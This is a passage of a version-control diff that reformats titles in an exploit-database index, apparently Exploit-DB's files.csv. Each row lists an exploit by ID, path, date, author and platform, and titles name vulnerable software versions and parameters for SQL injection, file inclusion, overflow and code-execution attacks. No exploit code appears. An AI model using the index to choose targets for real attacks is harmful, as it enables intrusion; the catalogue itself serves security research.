SQL Injection Exploit",2006-03-25,undefined1_,php,webapps,0 1610,platforms/php/webapps/1610.txt,"phpBookingCalendar 1.0c - (details_view.php) SQL Injection",2006-03-25,undefined1_,php,webapps,0 1611,platforms/php/webapps/1611.pl,"TFT Gallery 0.10 - Password Disclosure Remote Exploit",2006-03-25,undefined1_,php,webapps,0 -1612,platforms/php/webapps/1612.php,"CuteNews <= 1.4.1 (function.php) Local File Include Exploit",2006-03-26,"Hamid Ebadi",php,webapps,0 +1612,platforms/php/webapps/1612.php,"CuteNews <= 1.4.1 - (function.php) Local File Include Exploit",2006-03-26,"Hamid Ebadi",php,webapps,0 1613,platforms/windows/dos/1613.c,"Vavoom <= 1.19.1 - Multiple Vulnerabilities/Denial of Service Exploit",2006-03-26,"Luigi Auriemma",windows,dos,0 1614,platforms/windows/dos/1614.c,"csDoom <= 0.7 - Multiple Vulnerabilities/Denial of Service Exploit",2006-03-26,"Luigi Auriemma",windows,dos,0 1615,platforms/windows/dos/1615.txt,"Microsoft Office Products - Array Index Bounds Error (Unpatched) PoC",2006-03-27,posidron,windows,dos,0 @@ -1359,192 +1359,192 @@ id,file,description,date,author,platform,type,port 1617,platforms/php/webapps/1617.php,"PHPCollab 2.x / NetOffice 2.x - (sendpassword.php) SQL Injection Exploit",2006-03-28,rgod,php,webapps,0 1618,platforms/php/webapps/1618.c,"GreyMatter WebLog <= 1.21d Remote Command Execution Exploit (1)",2006-03-28,No_Face_King,php,webapps,0 1619,platforms/php/webapps/1619.pl,"GreyMatter WebLog <= 1.21d Remote Command Execution Exploit (2)",2006-03-28,Hessam-x,php,webapps,0 -1620,platforms/windows/remote/1620.pm,"Microsoft Internet Explorer - (createTextRang) Remote Exploit (meta update)",2006-04-01,"Randy Flood",windows,remote,0 +1620,platforms/windows/remote/1620.pm,"Microsoft Internet Explorer - (createTextRang) Remote Exploit (Metasploit)",2006-04-01,"Randy Flood",windows,remote,0 1621,platforms/php/webapps/1621.php,"Plogger <= Beta 2.1 Administrative Credentials Disclosure Exploit",2006-03-28,rgod,php,webapps,0 1622,platforms/multiple/dos/1622.pl,"RealPlayer <= 10.5 (6.0.12.1040-1348) - SWF Buffer Overflow PoC",2006-03-28,"Federico L. Bossi Bonin",multiple,dos,0 -1623,platforms/asp/webapps/1623.pl,"EzASPSite <= 2.0 RC3 (Scheme) Remote SQL Injection Exploit",2006-03-29,nukedx,asp,webapps,0 -1624,platforms/tru64/local/1624.pl,"Tru64 UNIX 5.0 (Rev. 910) rdist NLSPATH Buffer Overflow Exploit",2006-03-29,"Kevin Finisterre",tru64,local,0 -1625,platforms/tru64/local/1625.pl,"Tru64 UNIX 5.0 (Rev. 910) edauth NLSPATH Buffer Overflow Exploit",2006-03-29,"Kevin Finisterre",tru64,local,0 +1623,platforms/asp/webapps/1623.pl,"EzASPSite <= 2.0 RC3 - (Scheme) Remote SQL Injection Exploit",2006-03-29,nukedx,asp,webapps,0 +1624,platforms/tru64/local/1624.pl,"Tru64 UNIX 5.0 - (Rev. 910) rdist NLSPATH Buffer Overflow Exploit",2006-03-29,"Kevin Finisterre",tru64,local,0 +1625,platforms/tru64/local/1625.pl,"Tru64 UNIX 5.0 - (Rev. 910) edauth NLSPATH Buffer Overflow Exploit",2006-03-29,"Kevin Finisterre",tru64,local,0 1626,platforms/windows/remote/1626.pm,"PeerCast <= 0.1216 - Remote Buffer Overflow Exploit (Win32) (Metasploit)",2006-03-30,"H D Moore",windows,remote,7144 -1627,platforms/php/webapps/1627.php,"Claroline <= 1.7.4 (scormExport.inc.php) Remote Code Execution Exploit",2006-03-30,rgod,php,webapps,0 +1627,platforms/php/webapps/1627.php,"Claroline <= 1.7.4 - (scormExport.inc.php) Remote Code Execution Exploit",2006-03-30,rgod,php,webapps,0 1628,platforms/windows/remote/1628.cpp,"Microsoft Internet Explorer - (createTextRang) Download Shellcoded Exploit (2)",2006-03-31,ATmaCA,windows,remote,0 -1629,platforms/php/webapps/1629.pl,"SQuery <= 4.5 (libpath) Remote File Inclusion Exploit",2006-04-01,uid0,php,webapps,0 +1629,platforms/php/webapps/1629.pl,"SQuery <= 4.5 - (libpath) Remote File Inclusion Exploit",2006-04-01,uid0,php,webapps,0 1630,platforms/php/webapps/1630.pl,"PHPNuke-Clan 3.0.1 - (vwar_root2) Remote File Inclusion Exploit",2006-04-01,uid0,php,webapps,0 1631,platforms/php/webapps/1631.php,"ReloadCMS <= 1.2.5 - Cross-Site Scripting / Remote Code Execution Exploit",2006-04-02,rgod,php,webapps,0 1632,platforms/php/webapps/1632.pl,"VWar 1.5.0 R12 - Remote File Inclusion Exploit",2006-04-02,uid0,php,webapps,0 1633,platforms/windows/dos/1633.c,"Total Commander 6.x - (unacev2.dll) Buffer Overflow PoC Exploit",2006-04-02,darkeagle,windows,dos,0 -1634,platforms/linux/dos/1634.pl,"mpg123 0.59r Malformed mp3 (SIGSEGV) Proof of Concept",2006-04-02,nitr0us,linux,dos,0 -1640,platforms/php/webapps/1640.pl,"AngelineCMS 0.8.1 (installpath) Remote File Inclusion Exploit",2006-04-04,K-159,php,webapps,0 +1634,platforms/linux/dos/1634.pl,"mpg123 0.59r Malformed mp3 - (SIGSEGV) Proof of Concept",2006-04-02,nitr0us,linux,dos,0 +1640,platforms/php/webapps/1640.pl,"AngelineCMS 0.8.1 - (installpath) Remote File Inclusion Exploit",2006-04-04,K-159,php,webapps,0 1641,platforms/linux/dos/1641.pl,"Libxine <= 1.14 MPEG Stream Buffer Overflow PoC",2006-04-04,"Federico L. Bossi Bonin",linux,dos,0 1642,platforms/windows/dos/1642.c,"Ultr@VNC <= 1.0.1 VNCLog::ReallyPrint Remote Buffer Overflow PoC",2006-04-04,"Luigi Auriemma",windows,dos,0 1643,platforms/windows/dos/1643.c,"Ultr@VNC <= 1.0.1 client Log::ReallyPrint Buffer Overflow PoC",2006-04-04,"Luigi Auriemma",windows,dos,0 -1644,platforms/php/webapps/1644.pl,"INDEXU <= 5.0.1 (base_path) Remote File Inclusion Exploit",2006-04-04,K-159,php,webapps,0 +1644,platforms/php/webapps/1644.pl,"INDEXU <= 5.0.1 - (base_path) Remote File Inclusion Exploit",2006-04-04,K-159,php,webapps,0 1645,platforms/php/webapps/1645.pl,"Crafty Syntax Image Gallery <= 3.1g Remote Code Execution Exploit",2006-04-04,undefined1_,php,webapps,0 -1646,platforms/php/webapps/1646.php,"phpMyChat <= 0.14.5 (SYS enter) Remote Code Execution Exploit",2006-04-05,rgod,php,webapps,0 +1646,platforms/php/webapps/1646.php,"phpMyChat <= 0.14.5 - (SYS enter) Remote Code Execution Exploit",2006-04-05,rgod,php,webapps,0 1647,platforms/php/webapps/1647.php,"phpMyChat 0.15.0dev (SYS enter) Remote Code Execution Exploit",2006-04-06,rgod,php,webapps,0 1650,platforms/php/webapps/1650.pl,"Horde Help Viewer <= 3.1 - Remote Command Execution Exploit",2006-04-07,deese,php,webapps,0 1651,platforms/php/dos/1651.php,"ADODB < 4.70 - (tmssql.php) Denial of Service",2006-04-09,rgod,php,dos,0 1652,platforms/php/webapps/1652.php,"ADODB < 4.70 (PhpOpenChat 3.0.x) - Server.php SQL Injection Exploit",2006-04-09,rgod,php,webapps,0 1653,platforms/php/webapps/1653.txt,"dnGuestbook <= 2.0 - Remote SQL Injection Vulnerabilities",2006-04-09,snatcher,php,webapps,0 1654,platforms/php/webapps/1654.txt,"autonomous lan party <= 0.98.1.0 - Remote File Inclusion",2006-04-09,Codexploder,php,webapps,0 -1655,platforms/php/webapps/1655.php,"XBrite Members <= 1.1 (id) Remote SQL Injection Exploit",2006-04-09,snatcher,php,webapps,0 +1655,platforms/php/webapps/1655.php,"XBrite Members <= 1.1 - (id) Remote SQL Injection Exploit",2006-04-09,snatcher,php,webapps,0 1656,platforms/php/webapps/1656.txt,"Sire 2.0 (lire.php) - Remote File Inclusion/Arbitrary File Upload",2006-04-09,simo64,php,webapps,0 1657,platforms/linux/dos/1657.asm,"Linux Kernel 2.6.x - sys_timer_create() Local Denial of Service Exploit",2006-04-09,fingerout,linux,dos,0 1659,platforms/php/webapps/1659.php,"PHPList <= 2.10.2 - GLOBALS[] Remote Code Execution Exploit",2006-04-10,rgod,php,webapps,0 1660,platforms/php/webapps/1660.pm,"Horde <= 3.0.9/3.1.0 - (Help Viewer) Remote Code Execution (Metasploit)",2006-04-10,Inkubus,php,webapps,0 -1661,platforms/php/webapps/1661.pl,"phpBB <= 2.0.19 (user_sig_bbcode_uid) Remote Code Execution Exploit",2006-04-10,RusH,php,webapps,0 +1661,platforms/php/webapps/1661.pl,"phpBB <= 2.0.19 - (user_sig_bbcode_uid) Remote Code Execution Exploit",2006-04-10,RusH,php,webapps,0 1662,platforms/php/webapps/1662.php,"Clansys 1.1 (showid) - Remote SQL Injection Exploit",2006-04-10,snatcher,php,webapps,0 -1663,platforms/php/webapps/1663.php,"Simplog <= 0.9.2 (s) Remote Commands Execution Exploit",2006-04-11,rgod,php,webapps,0 +1663,platforms/php/webapps/1663.php,"Simplog <= 0.9.2 - (s) Remote Commands Execution Exploit",2006-04-11,rgod,php,webapps,0 1664,platforms/windows/remote/1664.py,"Ultr@VNC <= 1.0.1 client Log::ReallyPrint Buffer Overflow Exploit",2006-04-11,"Paul Haas",windows,remote,0 -1665,platforms/php/webapps/1665.pl,"Sphider <= 1.3 (configset.php) Arbitrary Remote Inclusion Exploit",2006-04-12,rgod,php,webapps,0 +1665,platforms/php/webapps/1665.pl,"Sphider <= 1.3 - (configset.php) Arbitrary Remote Inclusion Exploit",2006-04-12,rgod,php,webapps,0 1666,platforms/php/webapps/1666.php,"PHP121 Instant Messenger <= 1.4 - Remote Code Execution Exploit",2006-04-12,rgod,php,webapps,0 1667,platforms/multiple/dos/1667.html,"Mozilla Firefox <= 1.5.0.1 / Camino <= 1.0 - Null Pointer Dereference Crash",2006-04-13,BuHa,multiple,dos,0 1668,platforms/php/webapps/1668.php,"vBulletin ImpEx <= 1.74 - Remote Command Execution Exploit",2006-04-13,ReZEN,php,webapps,0 1669,platforms/cgi/webapps/1669.pl,"Censtore <= 7.3.x - (censtore.cgi) Remote Command Execution Exploit",2006-04-13,FOX_MULDER,cgi,webapps,0 -1670,platforms/cgi/webapps/1670.pl,"quizz <= 1.01 (quizz.pl) Remote Command Execution Exploit",2006-04-13,FOX_MULDER,cgi,webapps,0 +1670,platforms/cgi/webapps/1670.pl,"quizz <= 1.01 - (quizz.pl) Remote Command Execution Exploit",2006-04-13,FOX_MULDER,cgi,webapps,0 1671,platforms/multiple/dos/1671.c,"panic-reloaded TCP Denial of Service Tool",2006-04-13,hash,multiple,dos,0 1672,platforms/php/webapps/1672.pl,"PAJAX <= 0.5.1 - Remote Code Execution Exploit",2006-04-13,Stoney,php,webapps,0 -1673,platforms/php/webapps/1673.php,"phpWebSite <= 0.10.2 (hub_dir) Remote Commands Execution Exploit",2006-04-14,rgod,php,webapps,0 -1674,platforms/php/webapps/1674.txt,"osCommerce <= 2.2 (extras) Source Code Disclosure",2006-04-14,rgod,php,webapps,0 -1677,platforms/cgi/webapps/1677.php,"SysInfo 1.21 (sysinfo.cgi) Remote Command Execution Exploit",2006-04-14,rgod,cgi,webapps,0 +1673,platforms/php/webapps/1673.php,"phpWebSite <= 0.10.2 - (hub_dir) Remote Commands Execution Exploit",2006-04-14,rgod,php,webapps,0 +1674,platforms/php/webapps/1674.txt,"osCommerce <= 2.2 - (extras) Source Code Disclosure",2006-04-14,rgod,php,webapps,0 +1677,platforms/cgi/webapps/1677.php,"SysInfo 1.21 - (sysinfo.cgi) Remote Command Execution Exploit",2006-04-14,rgod,cgi,webapps,0 1678,platforms/php/webapps/1678.php,"PHP Album <= 0.3.2.3 - Remote Command Execution Exploit",2006-04-15,rgod,php,webapps,0 -1679,platforms/novell/remote/1679.pm,"Novell Messenger Server 2.0 (Accept-Language) Remote Overflow Exploit",2006-04-15,"H D Moore",novell,remote,8300 +1679,platforms/novell/remote/1679.pm,"Novell Messenger Server 2.0 - (Accept-Language) Remote Overflow Exploit",2006-04-15,"H D Moore",novell,remote,8300 1680,platforms/cgi/webapps/1680.pm,"Symantec Sygate Management Server - (login) SQL Injection Exploit",2006-04-15,Nicob,cgi,webapps,0 -1681,platforms/windows/remote/1681.pm,"Sybase EAServer 5.2 (WebConsole) Remote Stack Overflow Exploit",2006-04-15,anonymous,windows,remote,8080 +1681,platforms/windows/remote/1681.pm,"Sybase EAServer 5.2 - (WebConsole) Remote Stack Overflow Exploit",2006-04-15,anonymous,windows,remote,8080 1682,platforms/php/webapps/1682.php,"Fuju News 1.0 - Authentication Bypass / Remote SQL Injection Exploit",2006-04-16,snatcher,php,webapps,0 1683,platforms/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - Remote SQL Injection Exploit",2006-04-16,snatcher,php,webapps,0 -1686,platforms/php/webapps/1686.pl,"FlexBB <= 0.5.5 (/inc/start.php _COOKIE) Remote SQL ByPass Exploit",2006-04-17,Devil-00,php,webapps,0 -1687,platforms/php/webapps/1687.txt,"MyEvent <= 1.3 (myevent_path) Remote File Inclusion",2006-04-17,botan,php,webapps,0 -1688,platforms/windows/dos/1688.c,"Neon Responder 5.4 (Clock Synchronization) Denial of Service Exploit",2006-04-17,"Stefan Lochbihler",windows,dos,0 +1686,platforms/php/webapps/1686.pl,"FlexBB <= 0.5.5 - (/inc/start.php _COOKIE) Remote SQL ByPass Exploit",2006-04-17,Devil-00,php,webapps,0 +1687,platforms/php/webapps/1687.txt,"MyEvent <= 1.3 - (myevent_path) Remote File Inclusion",2006-04-17,botan,php,webapps,0 +1688,platforms/windows/dos/1688.c,"Neon Responder 5.4 - (Clock Synchronization) Denial of Service Exploit",2006-04-17,"Stefan Lochbihler",windows,dos,0 1694,platforms/php/webapps/1694.pl,"Internet PhotoShow (page) - Remote File Inclusion Exploit",2006-04-18,Hessam-x,php,webapps,0 1695,platforms/php/webapps/1695.pl,"PHP Net Tools <= 2.7.1 - Remote Code Execution Exploit",2006-04-18,FOX_MULDER,php,webapps,0 -1697,platforms/php/webapps/1697.php,"PCPIN Chat <= 5.0.4 (login/language) Remote Code Execution Exploit",2006-04-19,rgod,php,webapps,0 +1697,platforms/php/webapps/1697.php,"PCPIN Chat <= 5.0.4 - (login/language) Remote Code Execution Exploit",2006-04-19,rgod,php,webapps,0 1698,platforms/php/webapps/1698.php,"Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit",2006-04-19,trueend5,php,webapps,0 1699,platforms/php/webapps/1699.txt,"RechnungsZentrale V2 <= 1.1.3 - Remote Inclusion",2006-04-19,"GroundZero Security",php,webapps,0 -1700,platforms/asp/webapps/1700.pl,"ASPSitem <= 1.83 (Haberler.asp) Remote SQL Injection Exploit",2006-04-19,nukedx,asp,webapps,0 -1701,platforms/php/webapps/1701.php,"PHPSurveyor <= 0.995 (surveyid) Remote Command Execution Exploit",2006-04-20,rgod,php,webapps,0 +1700,platforms/asp/webapps/1700.pl,"ASPSitem <= 1.83 - (Haberler.asp) Remote SQL Injection Exploit",2006-04-19,nukedx,asp,webapps,0 +1701,platforms/php/webapps/1701.php,"PHPSurveyor <= 0.995 - (surveyid) Remote Command Execution Exploit",2006-04-20,rgod,php,webapps,0 1703,platforms/windows/remote/1703.pl,"Symantec Scan Engine 5.0.x.x Change Admin Password Remote Exploit",2006-04-21,"Marc Bevand",windows,remote,8004 -1704,platforms/php/webapps/1704.pl,"CoreNews <= 2.0.1 (userid) Remote SQL Injection Exploit",2006-04-21,nukedx,php,webapps,0 -1705,platforms/php/webapps/1705.pl,"Simplog <= 0.9.3 (tid) Remote SQL Injection Exploit",2006-04-21,nukedx,php,webapps,0 -1706,platforms/php/webapps/1706.txt,"dForum <= 1.5 (DFORUM_PATH) Multiple Remote File Inclusions",2006-04-21,nukedx,php,webapps,0 +1704,platforms/php/webapps/1704.pl,"CoreNews <= 2.0.1 - (userid) Remote SQL Injection Exploit",2006-04-21,nukedx,php,webapps,0 +1705,platforms/php/webapps/1705.pl,"Simplog <= 0.9.3 - (tid) Remote SQL Injection Exploit",2006-04-21,nukedx,php,webapps,0 +1706,platforms/php/webapps/1706.txt,"dForum <= 1.5 - (DFORUM_PATH) Multiple Remote File Inclusions",2006-04-21,nukedx,php,webapps,0 1707,platforms/php/webapps/1707.pl,"My Gaming Ladder Combo System <= 7.0 - Remote Code Execution Exploit",2006-04-22,nukedx,php,webapps,0 1708,platforms/windows/dos/1708.txt,"Skulltag <= 0.96f - (Version String) Remote Format String PoC",2006-04-23,"Luigi Auriemma",windows,dos,0 1709,platforms/multiple/dos/1709.txt,"OpenTTD <= 0.4.7 - Multiple Vulnerabilities/Denial of Service Exploit",2006-04-23,"Luigi Auriemma",multiple,dos,0 -1710,platforms/php/webapps/1710.txt,"Clansys <= 1.1 (index.php page) PHP Code Insertion",2006-04-23,nukedx,php,webapps,0 +1710,platforms/php/webapps/1710.txt,"Clansys <= 1.1 - (index.php page) PHP Code Insertion",2006-04-23,nukedx,php,webapps,0 1711,platforms/php/webapps/1711.txt,"Built2Go PHP Movie Review <= 2B Remote File Inclusion",2006-04-23,"Camille Myers",php,webapps,0 1712,platforms/osx/dos/1712.html,"Apple Mac OS X Safari <= 2.0.3 (417.9.2) - Multiple Vulnerabilities (PoC)",2006-04-24,"Tom Ferris",osx,dos,0 -1713,platforms/php/webapps/1713.pl,"FlexBB <= 0.5.5 (function/showprofile.php) SQL Injection Exploit",2006-04-24,Devil-00,php,webapps,0 -1714,platforms/asp/webapps/1714.txt,"BK Forum <= 4.0 (member.asp) Remote SQL Injection",2006-04-24,n0m3rcy,asp,webapps,0 -1715,platforms/osx/dos/1715.html,"Apple Mac OS X Safari <= 2.0.3 (417.9.2) (ROWSPAN) DoS PoC",2006-04-24,"Yannick von Arx",osx,dos,0 -1716,platforms/multiple/dos/1716.html,"Mozilla Firefox <= 1.5.0.2 (js320.dll/xpcom_core.dll) Denial of Service PoC",2006-04-24,splices,multiple,dos,0 -1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 (long get request) Remote Buffer Overflow Exploit",2006-04-25,c0d3r,linux,remote,0 +1713,platforms/php/webapps/1713.pl,"FlexBB <= 0.5.5 - (function/showprofile.php) SQL Injection Exploit",2006-04-24,Devil-00,php,webapps,0 +1714,platforms/asp/webapps/1714.txt,"BK Forum <= 4.0 - (member.asp) Remote SQL Injection",2006-04-24,n0m3rcy,asp,webapps,0 +1715,platforms/osx/dos/1715.html,"Apple Mac OS X Safari <= 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC",2006-04-24,"Yannick von Arx",osx,dos,0 +1716,platforms/multiple/dos/1716.html,"Mozilla Firefox <= 1.5.0.2 - (js320.dll/xpcom_core.dll) Denial of Service PoC",2006-04-24,splices,multiple,dos,0 +1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 - (long get request) Remote Buffer Overflow Exploit",2006-04-25,c0d3r,linux,remote,0 1718,platforms/hardware/dos/1718.pl,"OCE 3121/3122 Printer (parser.exe) Denial of Service Exploit",2006-04-26,sh4d0wman,hardware,dos,0 -1719,platforms/multiple/local/1719.txt,"Oracle <= 10g Release 2 (DBMS_EXPORT_EXTENSION) Local SQL Exploit",2006-04-26,N1V1Hd,multiple,local,0 -1720,platforms/php/webapps/1720.pl,"Invision Power Board <= 2.1.5 (lastdate) Remote Code Execution Exploit",2006-04-26,RusH,php,webapps,0 +1719,platforms/multiple/local/1719.txt,"Oracle <= 10g Release 2 - (DBMS_EXPORT_EXTENSION) Local SQL Exploit",2006-04-26,N1V1Hd,multiple,local,0 +1720,platforms/php/webapps/1720.pl,"Invision Power Board <= 2.1.5 - (lastdate) Remote Code Execution Exploit",2006-04-26,RusH,php,webapps,0 1721,platforms/windows/dos/1721.pl,"BL4 SMTP Server < 0.1.5 - Remote Buffer Overflow PoC",2006-04-27,"Dedi Dwianto",windows,dos,0 -1722,platforms/php/webapps/1722.txt,"TopList <= 1.3.8 (phpBB Hack) Remote File Inclusion",2006-04-27,[Oo],php,webapps,0 +1722,platforms/php/webapps/1722.txt,"TopList <= 1.3.8 - (phpBB Hack) Remote File Inclusion",2006-04-27,[Oo],php,webapps,0 1723,platforms/php/webapps/1723.txt,"Advanced GuestBook <= 2.4.0 - (phpBB) File Inclusion",2006-04-28,[Oo],php,webapps,0 -1724,platforms/php/webapps/1724.pl,"TopList <= 1.3.8 (phpBB Hack) Remote Inclusion Exploit",2006-04-28,FOX_MULDER,php,webapps,0 -1725,platforms/php/webapps/1725.pl,"Advanced GuestBook <= 2.4.0 (phpBB) Remote File Inclusion Exploit",2006-04-28,n0m3rcy,php,webapps,0 +1724,platforms/php/webapps/1724.pl,"TopList <= 1.3.8 - (phpBB Hack) Remote Inclusion Exploit",2006-04-28,FOX_MULDER,php,webapps,0 +1725,platforms/php/webapps/1725.pl,"Advanced GuestBook <= 2.4.0 - (phpBB) Remote File Inclusion Exploit",2006-04-28,n0m3rcy,php,webapps,0 1726,platforms/php/webapps/1726.pl,"Invision Power Board <= 2.1.5 - search.php Remote Code Execution Exploit",2006-04-29,"Javier Olascoaga",php,webapps,0 1727,platforms/php/webapps/1727.txt,"openPHPNuke <= 2.3.3 - Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 -1728,platforms/php/webapps/1728.txt,"Knowledge Base Mod <= 2.0.2 (phpBB) Remote Inclusion",2006-04-29,[Oo],php,webapps,0 -1729,platforms/php/webapps/1729.txt,"Limbo CMS <= 1.0.4.2 (sql.php) Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 +1728,platforms/php/webapps/1728.txt,"Knowledge Base Mod <= 2.0.2 - (phpBB) Remote Inclusion",2006-04-29,[Oo],php,webapps,0 +1729,platforms/php/webapps/1729.txt,"Limbo CMS <= 1.0.4.2 - (sql.php) Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 1730,platforms/php/webapps/1730.txt,"Aardvark Topsites PHP <= 4.2.2 - (path) Remote File Inclusion",2006-04-30,[Oo],php,webapps,0 1731,platforms/php/webapps/1731.txt,"phpMyAgenda <= 3.0 Final (rootagenda) Remote Include",2006-04-30,Aesthetico,php,webapps,0 -1732,platforms/php/webapps/1732.pl,"Aardvark Topsites PHP <= 4.2.2 (lostpw.php) Remote Include Exploit",2006-04-30,cijfer,php,webapps,0 -1733,platforms/php/webapps/1733.pl,"Invision Power Board <= 2.1.5 (from_contact) SQL Injection Exploit",2006-05-01,"Ykstortion Security",php,webapps,0 -1738,platforms/php/webapps/1738.php,"X7 Chat <= 2.0 (help_file) Remote Commands Execution Exploit",2006-05-02,rgod,php,webapps,0 -1739,platforms/osx/remote/1739.pl,"Darwin Streaming Server <= 4.1.2 (parse_xml.cgi) Code Execution Exploit",2003-02-24,FOX_MULDER,osx,remote,0 +1732,platforms/php/webapps/1732.pl,"Aardvark Topsites PHP <= 4.2.2 - (lostpw.php) Remote Include Exploit",2006-04-30,cijfer,php,webapps,0 +1733,platforms/php/webapps/1733.pl,"Invision Power Board <= 2.1.5 - (from_contact) SQL Injection Exploit",2006-05-01,"Ykstortion Security",php,webapps,0 +1738,platforms/php/webapps/1738.php,"X7 Chat <= 2.0 - (help_file) Remote Commands Execution Exploit",2006-05-02,rgod,php,webapps,0 +1739,platforms/osx/remote/1739.pl,"Darwin Streaming Server <= 4.1.2 - (parse_xml.cgi) Code Execution Exploit",2003-02-24,FOX_MULDER,osx,remote,0 1740,platforms/php/webapps/1740.pl,"Fast Click <= 1.1.3 / <= 2.3.8 - (show.php) Remote File Inclusion Exploit",2006-05-02,R@1D3N,php,webapps,0 1741,platforms/linux/remote/1741.c,"MySQL <= 5.0.20 COM_TABLE_DUMP Memory Leak/Remote BoF Exploit",2006-05-02,"Stefano Di Paola",linux,remote,3306 1742,platforms/linux/remote/1742.c,"MySQL <= 4.1.18 / 5.0.20 - Local/Remote Information Leakage Exploit",2006-05-02,"Stefano Di Paola",linux,remote,0 1743,platforms/windows/dos/1743.pl,"Golden FTP Server Pro 2.70 - (APPE) Remote Buffer Overflow PoC",2006-05-03,"Jerome Athias",windows,dos,0 -1744,platforms/php/webapps/1744.pl,"Albinator <= 2.0.6 (Config_rootdir) Remote File Inclusion Exploit",2006-05-03,webDEViL,php,webapps,0 -1746,platforms/linux/dos/1746.pl,"zawhttpd <= 0.8.23 (GET) Remote Buffer Overflow DoS",2006-05-04,"Kamil Sienicki",linux,dos,0 +1744,platforms/php/webapps/1744.pl,"Albinator <= 2.0.6 - (Config_rootdir) Remote File Inclusion Exploit",2006-05-03,webDEViL,php,webapps,0 +1746,platforms/linux/dos/1746.pl,"zawhttpd <= 0.8.23 - (GET) Remote Buffer Overflow DoS",2006-05-04,"Kamil Sienicki",linux,dos,0 1747,platforms/php/webapps/1747.pl,"Auction <= 1.3m (phpbb_root_path) Remote File Include Exploit",2006-05-04,webDEViL,php,webapps,0 -1748,platforms/windows/dos/1748.py,"XM Easy Personal FTP Server <= 4.3 (USER) Remote Buffer Overflow PoC",2006-05-04,rewterz,windows,dos,0 -1749,platforms/windows/dos/1749.pl,"acFTP FTP Server <= 1.4 (USER) Remote Buffer Overflow PoC",2006-05-04,Preddy,windows,dos,0 +1748,platforms/windows/dos/1748.py,"XM Easy Personal FTP Server <= 4.3 - (USER) Remote Buffer Overflow PoC",2006-05-04,rewterz,windows,dos,0 +1749,platforms/windows/dos/1749.pl,"acFTP FTP Server <= 1.4 - (USER) Remote Buffer Overflow PoC",2006-05-04,Preddy,windows,dos,0 1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b R_RemapShader() Remote Client BoF Exploit",2006-05-05,landser,linux,remote,0 -1751,platforms/php/webapps/1751.php,"Limbo CMS <= 1.0.4.2 (catid) Remote SQL Injection Exploit",2006-05-05,[Oo],php,webapps,0 +1751,platforms/php/webapps/1751.php,"Limbo CMS <= 1.0.4.2 - (catid) Remote SQL Injection Exploit",2006-05-05,[Oo],php,webapps,0 1752,platforms/php/webapps/1752.pl,"StatIt 4 - (statitpath) Remote File Inclusion Exploit",2006-05-05,IGNOR3,php,webapps,0 -1753,platforms/php/webapps/1753.txt,"TotalCalendar <= 2.30 (inc) Remote File Include",2006-05-05,Aesthetico,php,webapps,0 -1754,platforms/windows/dos/1754.py,"FileCOPA FTP Server <= 1.01 (USER) Remote Pre-Auth DoS",2006-05-05,Bigeazer,windows,dos,0 -1755,platforms/cgi/webapps/1755.py,"AWStats <= 6.5 (migrate) Remote Shell Command Injection Exploit",2006-05-06,redsand,cgi,webapps,0 -1756,platforms/php/webapps/1756.pl,"HiveMail <= 1.3 (addressbook.add.php) Remote Code Execution Exploit",2006-05-06,[Oo],php,webapps,0 -1757,platforms/windows/dos/1757.c,"acFTP FTP Server <= 1.4 (USER) Remote Denial of Service Exploit",2006-05-06,Omni,windows,dos,0 -1758,platforms/windows/dos/1758.pl,"TinyFTPD <= 1.4 (USER) Remote Buffer Overflow DoS",2006-05-06,[Oo],windows,dos,0 -1759,platforms/asp/webapps/1759.txt,"VP-ASP 6.00 (shopcurrency.asp) Remote SQL Injection",2006-05-06,tracewar,asp,webapps,0 +1753,platforms/php/webapps/1753.txt,"TotalCalendar <= 2.30 - (inc) Remote File Include",2006-05-05,Aesthetico,php,webapps,0 +1754,platforms/windows/dos/1754.py,"FileCOPA FTP Server <= 1.01 - (USER) Remote Pre-Auth DoS",2006-05-05,Bigeazer,windows,dos,0 +1755,platforms/cgi/webapps/1755.py,"AWStats <= 6.5 - (migrate) Remote Shell Command Injection Exploit",2006-05-06,redsand,cgi,webapps,0 +1756,platforms/php/webapps/1756.pl,"HiveMail <= 1.3 - (addressbook.add.php) Remote Code Execution Exploit",2006-05-06,[Oo],php,webapps,0 +1757,platforms/windows/dos/1757.c,"acFTP FTP Server <= 1.4 - (USER) Remote Denial of Service Exploit",2006-05-06,Omni,windows,dos,0 +1758,platforms/windows/dos/1758.pl,"TinyFTPD <= 1.4 - (USER) Remote Buffer Overflow DoS",2006-05-06,[Oo],windows,dos,0 +1759,platforms/asp/webapps/1759.txt,"VP-ASP 6.00 - (shopcurrency.asp) Remote SQL Injection",2006-05-06,tracewar,asp,webapps,0 1760,platforms/php/webapps/1760.php,"PHP-Fusion <= 6.00.306 - Multiple Vulnerabilities",2006-05-07,rgod,php,webapps,0 -1761,platforms/php/webapps/1761.pl,"Jetbox CMS <= 2.1 (relative_script_path) Remote File Inclusion Exploit",2006-05-07,beford,php,webapps,0 -1763,platforms/php/webapps/1763.txt,"ACal <= 2.2.6 (day.php) Remote File Inclusion",2006-05-07,PiNGuX,php,webapps,0 -1764,platforms/php/webapps/1764.txt,"EQdkp <= 1.3.0 (dbal.php) Remote File Inclusion",2006-05-07,OLiBekaS,php,webapps,0 -1765,platforms/php/webapps/1765.pl,"Dokeos Lms <= 1.6.4 (authldap.php) Remote File Include Exploit",2006-05-08,beford,php,webapps,0 -1766,platforms/php/webapps/1766.pl,"Claroline e-Learning 1.75 (ldap.inc.php) Remote File Inclusion Exploit",2006-05-08,beford,php,webapps,0 -1767,platforms/php/webapps/1767.txt,"ActualAnalyzer Server <= 8.23 (rf) Remote File Include",2006-05-08,Aesthetico,php,webapps,0 -1768,platforms/php/webapps/1768.php,"ActualAnalyzer Pro <= 6.88 (rf) Remote File Include Exploit",2006-05-08,ReZEN,php,webapps,0 +1761,platforms/php/webapps/1761.pl,"Jetbox CMS <= 2.1 - (relative_script_path) Remote File Inclusion Exploit",2006-05-07,beford,php,webapps,0 +1763,platforms/php/webapps/1763.txt,"ACal <= 2.2.6 - (day.php) Remote File Inclusion",2006-05-07,PiNGuX,php,webapps,0 +1764,platforms/php/webapps/1764.txt,"EQdkp <= 1.3.0 - (dbal.php) Remote File 